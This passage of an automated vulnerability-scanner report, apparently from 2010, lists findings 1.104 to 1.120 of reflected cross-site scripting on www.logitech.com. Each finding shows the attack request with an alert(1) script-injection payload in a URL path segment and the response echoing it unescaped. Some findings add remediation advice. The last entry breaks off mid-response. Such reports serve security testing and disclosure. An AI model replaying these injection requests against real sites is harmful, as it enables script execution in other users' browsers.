1.104. http://www.logitech.com/assets/9653/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/9653/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777b6</script><script>alert(1)</script>190bc790f22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /777b6</script><script>alert(1)</script>190bc790f22/9653/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','777b6</script><script>alert(1)</script>190bc790f22/9653' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.105. http://www.logitech.com/css/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 130ab</script><script>alert(1)</script>fdd4ea32bae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css130ab</script><script>alert(1)</script>fdd4ea32bae/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css130ab</script><script>alert(1)</script>fdd4ea32bae' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.106. http://www.logitech.com/css/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7337e"><script>alert(1)</script>9c46007eace was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css7337e"><script>alert(1)</script>9c46007eace/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css7337e"><script>alert(1)</script>9c46007eace">
...[SNIP]...

1.107. http://www.logitech.com/css/v2/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ab5"><script>alert(1)</script>2a41a44e873 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css64ab5"><script>alert(1)</script>2a41a44e873/v2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css64ab5"><script>alert(1)</script>2a41a44e873/v2">
...[SNIP]...

1.108. http://www.logitech.com/css/v2/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7780a</script><script>alert(1)</script>e71e113e370 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css7780a</script><script>alert(1)</script>e71e113e370/v2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css7780a</script><script>alert(1)</script>e71e113e370/v2' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcs
...[SNIP]...

1.109. http://www.logitech.com/css/v2/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66455</script><script>alert(1)</script>93d408639fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v266455</script><script>alert(1)</script>93d408639fe/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v266455</script><script>alert(1)</script>93d408639fe' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.110. http://www.logitech.com/css/v2/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c8ec"><script>alert(1)</script>236c4f2a2fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v22c8ec"><script>alert(1)</script>236c4f2a2fb/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v22c8ec"><script>alert(1)</script>236c4f2a2fb">
...[SNIP]...

1.111. http://www.logitech.com/css/v2/category.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69747</script><script>alert(1)</script>2ead2981d11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/category.css69747</script><script>alert(1)</script>2ead2981d11 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:22 GMT
Connection: keep-alive
Content-Length: 31425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/category.css69747</script><script>alert(1)</script>2ead2981d11' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.112. http://www.logitech.com/css/v2/category.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69eaa"><script>alert(1)</script>b98875c86ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/category.css69eaa"><script>alert(1)</script>b98875c86ce HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:15 GMT
Connection: keep-alive
Content-Length: 31393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/category.css69eaa"><script>alert(1)</script>b98875c86ce">
...[SNIP]...

1.113. http://www.logitech.com/css/v2/category_ie.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_ie.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 677bf"><script>alert(1)</script>08d1a2cfc0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/category_ie.css677bf"><script>alert(1)</script>08d1a2cfc0a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:31 GMT
Connection: keep-alive
Content-Length: 31408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/category-ie.css677bf"><script>alert(1)</script>08d1a2cfc0a">
...[SNIP]...

1.114. http://www.logitech.com/css/v2/category_ie.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_ie.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19b2e</script><script>alert(1)</script>b9fd6cf839a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/category_ie.css19b2e</script><script>alert(1)</script>b9fd6cf839a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:47 GMT
Connection: keep-alive
Content-Length: 31440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/category-ie.css19b2e</script><script>alert(1)</script>b9fd6cf839a' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.115. http://www.logitech.com/css/v2/category_print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bdd9"><script>alert(1)</script>cfac07b515 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2/category_print.css1bdd9"><script>alert(1)</script>cfac07b515 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:34 GMT
Connection: keep-alive
Content-Length: 31418


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/category-print.css1bdd9"><script>alert(1)</script>cfac07b515">
...[SNIP]...

1.116. http://www.logitech.com/css/v2/category_print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/category_print.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21c2e</script><script>alert(1)</script>1fa3f266cb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/category_print.css21c2e</script><script>alert(1)</script>1fa3f266cb1 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:50 GMT
Connection: keep-alive
Content-Length: 31455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/category-print.css21c2e</script><script>alert(1)</script>1fa3f266cb1' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.117. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebd52</script><script>alert(1)</script>cffdcf4e525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssebd52</script><script>alert(1)</script>cffdcf4e525/v2/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','cssebd52</script><script>alert(1)</script>cffdcf4e525/v2/cmn' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS
...[SNIP]...

1.118. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6297"><script>alert(1)</script>71e93c23446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cssf6297"><script>alert(1)</script>71e93c23446/v2/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="cssf6297"><script>alert(1)</script>71e93c23446/v2/cmn">
...[SNIP]...

1.119. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e584a</script><script>alert(1)</script>b00ac24ac15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2e584a</script><script>alert(1)</script>b00ac24ac15/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2e584a</script><script>alert(1)</script>b00ac24ac15/cmn' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.120. http://www.logitech.com/css/v2/cmn/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/cmn/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b35"><script>alert(1)</script>64bd4772672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css/v2f5b35"><script>alert(1)</script>64bd4772672/cmn/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:23 GMT
